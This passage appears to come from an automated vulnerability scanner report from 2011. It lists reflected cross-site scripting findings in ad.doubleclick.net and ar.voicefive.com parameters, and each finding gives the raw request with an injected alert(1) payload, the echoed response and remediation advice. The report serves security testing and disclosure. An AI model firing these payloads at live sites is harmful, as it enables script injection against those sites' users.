b30/7/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=a9297"-alert(1)-"8496255074bhttp://www.renu.com/coupons.html?utm_source=adrx&utm_medium=banner&utm_campaign=renu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscript
...[SNIP]...

4.10. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [forced_click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edfb9'-alert(1)-'02371f85c62 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=edfb9'-alert(1)-'02371f85c62 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5856
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 24 Jun 2011 13:32:42 GMT
Expires: Fri, 24 Jun 2011 13:32:42 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
b30/7/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=edfb9'-alert(1)-'02371f85c62http://www.renu.com/coupons.html?utm_source=adrx&utm_medium=banner&utm_campaign=renu_2011\">
...[SNIP]...

4.11. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fc1a"-alert(1)-"5e22fb0853e was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=69fc1a"-alert(1)-"5e22fb0853e&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5917
Date: Fri, 24 Jun 2011 13:32:04 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:58:18 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3b30/f/7e/%2a/y%3B241862722%3B0-0%3B0%3B64680757%3B4307-300/250%3B40599384/40617171/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=69fc1a"-alert(1)-"5e22fb0853e&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

4.12. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57236'-alert(1)-'8e38fa4225c was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=657236'-alert(1)-'8e38fa4225c&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:32:08 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=657236'-alert(1)-'8e38fa4225c&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...

4.13. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8156"-alert(1)-"c271489ca7 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017e8156"-alert(1)-"c271489ca7&m=6&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5906
Date: Fri, 24 Jun 2011 13:31:55 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3b30/f/7d/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017e8156"-alert(1)-"c271489ca7&m=6&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

4.14. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [mid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce438'-alert(1)-'17c1f71f23 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017ce438'-alert(1)-'17c1f71f23&m=6&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5913
Date: Fri, 24 Jun 2011 13:31:59 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:58:18 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3b30/f/7d/%2a/y%3B241862722%3B0-0%3B0%3B64680757%3B4307-300/250%3B40599384/40617171/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017ce438'-alert(1)-'17c1f71f23&m=6&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...

4.15. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0882'-alert(1)-'351f198fca4 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553b0882'-alert(1)-'351f198fca4&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5917
Date: Fri, 24 Jun 2011 13:32:16 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:58:18 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ck.net/click%3Bh%3Dv8/3b30/f/7e/%2a/y%3B241862722%3B0-0%3B0%3B64680757%3B4307-300/250%3B40599384/40617171/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553b0882'-alert(1)-'351f198fca4&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...

4.16. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aefe1"-alert(1)-"70048dfceb8 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553aefe1"-alert(1)-"70048dfceb8&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:32:12 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ck.net/click%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553aefe1"-alert(1)-"70048dfceb8&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "
...[SNIP]...

4.17. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da161'-alert(1)-'636ccbb15bb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564da161'-alert(1)-'636ccbb15bb&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:31:51 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ref=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564da161'-alert(1)-'636ccbb15bb&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...

4.18. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38004"-alert(1)-"6e5cb2d63c0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=30656438004"-alert(1)-"6e5cb2d63c0&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:31:46 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
cape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=30656438004"-alert(1)-"6e5cb2d63c0&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFoun
...[SNIP]...

4.19. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [tp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bcde"-alert(1)-"e30639d2e6f was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=84bcde"-alert(1)-"e30639d2e6f&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5917
Date: Fri, 24 Jun 2011 13:32:29 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:58:18 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick%3Bh%3Dv8/3b30/f/7e/%2a/y%3B241862722%3B0-0%3B0%3B64680757%3B4307-300/250%3B40599384/40617171/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=84bcde"-alert(1)-"e30639d2e6f&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
...[SNIP]...

4.20. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [tp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fc56'-alert(1)-'5155e46d14c was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=88fc56'-alert(1)-'5155e46d14c&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:32:33 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=88fc56'-alert(1)-'5155e46d14c&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...

4.21. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 3a324<script>alert(1)</script>ae0e732eb9f was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction3a324<script>alert(1)</script>ae0e732eb9f&n=ar_int_p97174789&1308922038899 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 